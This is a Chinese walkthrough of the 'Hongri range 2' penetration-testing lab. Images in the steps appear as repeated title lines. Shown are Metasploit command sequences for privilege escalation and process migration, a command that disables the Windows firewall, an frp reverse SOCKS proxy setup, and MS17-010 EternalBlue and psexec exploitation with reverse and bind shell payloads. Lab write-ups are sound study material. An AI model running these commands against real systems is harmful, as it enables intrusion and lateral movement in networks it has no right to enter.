红日靶机二

信息收集

红日靶机二
红日靶机二
红日靶机二
红日靶机二

失败了  换一个漏洞

红日靶机二
红日靶机二
红日靶机二
红日靶机二
红日靶机二

木马上传

红日靶机二
红日靶机二
红日靶机二

meterpreter > background

msf5 exploit(multi/handler) >  use post/multi/recon/local_exploit_suggester

msf5 post(multi/recon/local_exploit_suggester) > set session 1

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.128 - Collecting local exploits for java/windows...

[-] 192.168.1.128 - No suggestions available.

[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) >

红日靶机二
红日靶机二

迁移进程

红日靶机二

自动迁移进程
run post/windows/manage/migrate

提权

红日靶机二

设置心跳

抓取密码

红日靶机二

进程

红日靶机二
红日靶机二

扫描10段端口

红日靶机二

查看用户

红日靶机二

域内信息

红日靶机二

查看防火墙并关闭

shell netsh firewall show state

shell netsh advfirewall set allprofiles state off

红日靶机二

横向移动

伪造票据

红日靶机二
红日靶机二
红日靶机二
红日靶机二
红日靶机二
红日靶机二

msf

frp 创建反向socks代理

修改frps.ini文件

vim frps.ini

红日靶机二

启动frp

./frps -c frps.ini

修改frpc.ini文件  

frpc.exe -c frpc.ini

添加路由

route add 10.10.10.0 255.255.255.0 1

route print

红日靶机二

msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.10

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

红日靶机二

尝试利用

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

红日靶机二

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.10

rhost => 10.10.10.10

msf5 exploit(windows/smb/ms17_010_psexec) > set rport 445

msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/shell/bind_tcp

payload => windows/x64/shell/bind_tcp

msf5 exploit(windows/smb/ms17_010_psexec) > run

红日靶机二

学习文章

https://www.jianshu.com/p/45ad9a534fb4

https://www.cnblogs.com/R1card0/articles/12960290.html

http://yugod.xmutsec.com/index.php/2020/07/15/53.html

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2021-10-29
  • 2023-03-29
  • 2021-11-07
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-06-13
  • 2022-01-30
  • 2022-02-16
  • 2021-10-26
  • 2021-09-02
  • 2021-07-10
  • 2022-12-23
相关资源
相似解决方案